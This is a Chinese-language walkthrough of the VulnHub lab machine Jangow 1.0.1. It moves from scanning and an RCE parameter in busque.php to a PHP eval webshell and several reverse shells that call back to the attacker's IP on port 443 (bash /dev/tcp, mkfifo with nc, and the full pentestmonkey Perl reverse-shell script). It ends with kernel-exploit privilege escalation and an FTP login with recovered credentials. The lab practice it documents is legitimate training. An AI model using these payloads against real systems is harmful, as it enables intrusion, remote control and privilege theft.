JANGOW: 1.0.1

靶机介绍及下载：Jangow: 1.0.1 ~ VulnHub
注，VM打开靶机检测不到IP解决方法参见：Vulnhub靶机检测不到IP

1. 信息收集

1.1. 主机探测

• 主机探测的方法及工具介绍可以参见：主动信息收集之主机发现 - z9m8r8 - 博客园，以 netdiscover 探测为例：

netdiscover  -r 192.168.226.0/24

• 靶机 IP：192.168.159.153

1.2. 端口扫描

• 端口扫描的方法和工具介绍可以参见：主动信息收集之端口扫描 - z9m8r8 - 博客园，以 nmap 扫描为例：

nmap -A 192.168.159.153 -p1-65535

开了21端口，则后面可以尝试远程登录【弱口令】，80的端口进一步进行Web信息收集

1.3. Web 信息收集

• 访问站点并进行目录遍历

随便点了点发现个特殊点，http://192.168.159.153/site/busque.php?buscar=，尝试赋值看有啥问题没，结果发现存在 RCE，为此渗透攻击时可以尝试写马或直接反弹shell。

dirsearch -u "http://192.168.159.153/"

有个备份文件访问下，得到了数据库信息，用户名和密码等，前面扫描到主机开21，后面可尝试用该用户名和密码登录。

2. 渗透攻击

2.1. 尝试反弹 shell

通过 http://192.168.159.153/site/busque.php?buscar= 执行下面命令，没反应，可能做了什么限制，后面再说。
各种反弹 SHELL 命令在线快捷生成版在线工具

bash -i >& /dev/tcp/192.168.159.152/4444 0>&1

2.2. 尝试写个 webshell

• 由于能正常解析PHP文件，所以写个PHP木马，用蚁剑连接测试。

echo '<?php eval($_POST["shell"]);' > webshell.php

即 http://192.168.159.153/site/busque.php?buscar=echo '<?php eval($_POST["shell"]);' > webshell.php ，执行完后用 ls 看有没有写入成功。

成功写入，蚁剑连接。

有个 WP ，看下配置文件 /wordpress/config.php

又发现个数据库连接的信息，浏览器访问测试下发现是错的，不过记下这个账号和密码或许有用。

访问文件发现了第一个 flag

权限太低，考虑再次反弹 shell 并提权吧。

2.3. 利用蚁剑反弹 shell

试了好几种 shell 均失败了，卡住了……
看了看其它人的解法，说是对端口做了限制，只有 443 能用……
学下 sainet 的处理方式，先将攻击机1-65535端口绑定至某一特定端口，然后再靶机跑脚本测试端口。

iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 4444

kali 开启侦听

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444

靶机用蚁剑新建脚本【port_script.sh】，赋予执行权限并执行

for i in {1..65534};
do
   timeout 1 nc -vz 192.168.159.152 $i && echo "$i open" >> out.txt || echo "$i close" >> out.txt;
done

删除 iptables 规则，基于 443 端口进一步反弹 shell

iptables -t nat -nvL

用蚁剑上传 perl-reverse-shell.pl 反弹【端口修改成443】
perl-reverse-shell.pl

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
# reverse是反向的意思，这里的方向定义的规则是：
# 攻击者对靶机的攻击是正向，靶机向攻击者发送请求是反向
my $ip = '192.168.159.152';	# 向攻击者的ip发送连接请求
my $port = 443;			# 向攻击者的ip的某端口发送连接请求
# 攻击者需要他提前开启侦听12345端口，也就是使用瑞士军刀命令工具：nc -lvvp 12345

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
		# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

	if ($auth) {
		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
			cgiprint("ERROR: Your client isn't authorised to view this page");
			cgiexit();
		}
	}
} elsif ($auth) {
	cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
	cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
	my $pid = fork();
	if ($pid) {
		cgiexit(0); # parent exits
	}

	setsid();
	chdir('/');
	umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
	cgiprint("Sent reverse shell to $ip:$port");
	cgiprintpage();
} else {
	cgiprint("Couldn't open reverse shell to $ip:$port: $!");
	cgiexit();	
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
	my $line = shift;
	$line .= "<p>\n";
	$global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
	cgiprintpage();
	exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
	print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

执行效果

很明显权限不足，需考虑提权。

2.4. shell 补充

此处 shell 反弹有多种方式，再举 2 个例子
kali 先开启 443 的监听
其一，蚁剑终端执行：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.152 443 >/tmp/f

其二，新建一个 php 文件，内容如下：

<?php 
	system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.152 443 >/tmp/f');
?>

浏览器访问触发

这个shell也是有局限性的，可以调用本地终端获取更高级的交互 shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

注，反弹 shell 是提权所需，另外用户的切换登录也是需要调用本地终端来实现的！

2.5. 提权

获取系统版本信息，以便查找提权漏洞

uname -a
#查看内核版本
lsb_release -a
#当前系统发行版的具体版本号

依据版本找漏洞Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

将下载的 45010.c，用蚁剑传至靶机，并用 gcc 编译

蚁剑的虚拟终端不能直接执行 exp 提权，用刚才反弹获得的 shell 提权

获得根目录下的 flag 。【提权并不是一帆风顺，漏洞试了好几个只有这个成功了】

2.6. ftp 登录测试

最后补充点，前面知道了 21 端口是开放的，尝试用前面得到的用户信息登录，发现只有 jangow01/abygurl69 能进去，但权限也很小，文件也上传不了……

再用前面的 shell 试下终端权限